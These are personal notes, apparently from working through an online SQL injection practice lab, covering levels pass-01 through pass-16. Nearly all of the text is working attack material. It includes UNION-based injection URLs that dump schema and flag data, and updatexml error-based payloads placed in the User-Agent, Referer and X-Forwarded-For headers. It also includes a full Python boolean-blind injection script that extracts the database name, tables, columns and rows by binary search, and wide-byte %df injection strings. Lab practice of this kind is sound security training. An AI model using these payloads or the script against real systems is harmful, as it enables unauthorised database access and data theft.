Sql-Labs 练习
http://inject2.lab.aqlab.cn:81/
pass-01
union select 1,database(),3
# error
union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='error'
# error_flag,user
union select 1,group_concat(column_name),3 from information_schema.columns where table_name='error_flag'
# Id,flag
union select 1,group_concat(flag),3 from error_flag
# Your Login name:zKaQ-Nf,zKaQ-BJY,zKaQ-XiaoFang,zKaq-98K
pass0x2 字符型
http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union select 1,2,'3
http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union select 1,database(),'3
# error
http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='error
# error_flag,user
http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='error_flag
# Id,flag
http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union select 1,group_concat(flag),3 from error_flag %23
# zKaQ-Nf,zKaQ-BJY,zKaQ-XiaoFang,zKaq-98K
pass0x3
('1') 拼接
pass0x4
("1") 拼接
http://inject2.lab.aqlab.cn:81/Pass-04/index.php?id=1") union select 1,group_concat(flag),3 from error_flag %23
pass0x5
union select 1,database(),3 #
#post_error
union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='post_error'#
#flag,user
union select 1,group_concat(column_name),3 from information_schema.columns where table_name='flag'#
#Id,flag
union select 1,group_concat(flag),3 from flag #
#Id,flag
pass0x6
("123") 拼接
pass-07
爆破出用户名密码后，根据源码提示在 header 的 User-Agent 处进行报错注入
'or updatexml(1,concat(0x7e,user()),1),1)#
'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1),1)#
'or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag_head')),1),1)#
'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#
pass-08
注入点变成 Referer 了。
pass-09
注入点变成 X-Forwarded-For 了。
pass-10 布尔盲注
import sys
import time
from requests_html import AsyncHTMLSession, HTMLSession
start_time = time.time()  # wall-clock start; the __main__ block reports elapsed time from this
session = HTMLSession()  # one requests_html session reused for every probe below
proxies = {}  # declared but not referenced by any function in this listing
url = 'http://inject2.lab.aqlab.cn:81/Pass-10/index.php?id=1'  # lab target; every payload is appended to this query string
# Boolean oracle: the page body contains this marker only when the injected condition is TRUE.
flag_success = '有数据'
# Payload templates, appended to `url` and filled via str.format by the helpers below.
# In every template except the first, the two trailing `{}` slots are (position, threshold)
# and are filled by search(); the first template's single slot is a candidate length.
payload1_database_length = ' and length(database())={}'
payload_database = ' and ord(substr(database(),{},1))>{}'
payload_table = ' and ord( SUBSTR((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{}'
# First `{}` is the table name (filled once by column()); the remaining two are for search().
payload_column = ' and ord( SUBSTR((select group_concat(column_name) from information_schema.columns where table_name="{}"),{},1))>{}'
# Named slots are filled once by data(); the positional ones are left for search().
payload_data = ' and ord( SUBSTR((select group_concat({column_name}) from {table_name}),{},1))>{}'
def database_length():
    """Print the length of the current database name.

    Tries every candidate length 0..127 in turn, one GET request each, and
    prints the first one for which the page body carries the ``flag_success``
    marker.  Prints nothing when no candidate matches.  Returns None.

    Each probe differs from the last only in the appended length test, so a
    server-side log sees up to 128 near-identical requests for the same id --
    the shape a rate-based detection keys on.
    """
    for candidate in range(128):
        probe = url + payload1_database_length.format(candidate)
        page = session.get(probe)
        if flag_success not in page.text:
            continue
        print('database length = ', candidate)
        return
def database():
    """Print the current database name, recovered via ``search``.

    Positions 1..127 are probed in order.  Scanning stops at the first
    character whose code is not in (32, 128] -- ``search`` hands back chr(32)
    when a position holds no character.  The name is printed, not returned.
    """
    recovered = []
    position = 1
    while position < 128:
        ch = search(position, payload_database)
        if not (32 < ord(ch) <= 128):
            break
        recovered.append(ch)
        position += 1
    print('database = ', ''.join(recovered))
def search(index, payload):
    """Binary-search the character code at 1-based position ``index``.

    ``payload`` must carry two positional ``{}`` slots, (position, threshold).
    Every loop iteration is one GET; the ``flag_success`` oracle in the body
    says whether the true code is above ``mid``.  The search space is 32..127,
    so a character costs at most 7 requests.  Returns the character as a
    one-char str; chr(32) is the value the callers treat as "no more data".
    """
    low = 32
    high = 128
    mid = (low + high) // 2
    while low < high:
        sql = url + payload.format(index, mid)
        res = session.get(sql)
        if flag_success in res.text:
            # TRUE branch: the code is strictly above mid, drop mid and below.
            low = mid + 1
        else:
            # FALSE branch: the code is <= mid, so mid stays a candidate.
            high = mid
        mid = (low + high) // 2
        # NOTE(review): presumably a position past the end of the string makes
        # every threshold test FALSE and drives mid down to 32; the early exit
        # here is what produces the chr(32) sentinel the callers check. Verify.
        if mid == 32:
            break
    return chr(mid)
def table():
    """Print the group_concat of table names in the current schema.

    Same scan as ``database``: positions 1..127 through ``search`` with
    ``payload_table``, stopping at the first code outside (32, 128].
    Printed, not returned.
    """
    names = ''
    for position in range(1, 128):
        ch = search(position, payload_table)
        code = ord(ch)
        if code <= 32 or code > 128:
            break
        names = names + ch
    print('table = ', names)
def column(table_name):
    """Print the group_concat of column names belonging to ``table_name``.

    The table name is baked into ``payload_column`` once, up front; the two
    remaining ``{}`` slots are re-emitted so ``search`` can fill them with
    (position, threshold).  Scan and stop rule are the same as ``database``.
    """
    template = payload_column.format(table_name, '{}', '{}')
    collected = []
    for position in range(1, 128):
        ch = search(position, template)
        if 32 < ord(ch) <= 128:
            collected.append(ch)
        else:
            break
    print('column = ', ''.join(collected))
def data(column_name, table_name):
    """Print the group_concat of ``column_name`` values from ``table_name``.

    ``payload_data`` is pre-filled once with its named slots; the positional
    slots are re-emitted as ``{}`` so ``search`` can supply (position,
    threshold).  Scan and stop rule are the same as ``database``.
    """
    template = payload_data.format('{}', '{}', column_name=column_name, table_name=table_name)
    values = ''
    for position in range(1, 128):
        ch = search(position, template)
        if not (32 < ord(ch) <= 128):
            break
        values += ch
    print('data = ', values)
if __name__ == '__main__':
    # Earlier stages, left commented with the values they produced on this lab:
    # database_length()
    # database()        # 'kanwolongxia'
    # table()           # 'loflag'
    # column('loflag')  # Id,flaglo
    data('flaglo', 'loflag')  # Id,flaglo
    elapsed = time.time() - start_time
    print("--- %s seconds ---" % elapsed)
pass-0x15
宽字节注入
id=1%df' union select 1,database(),3%23
pass-0x16
宽字节注入
id=1%df") union select 1,database(),3%23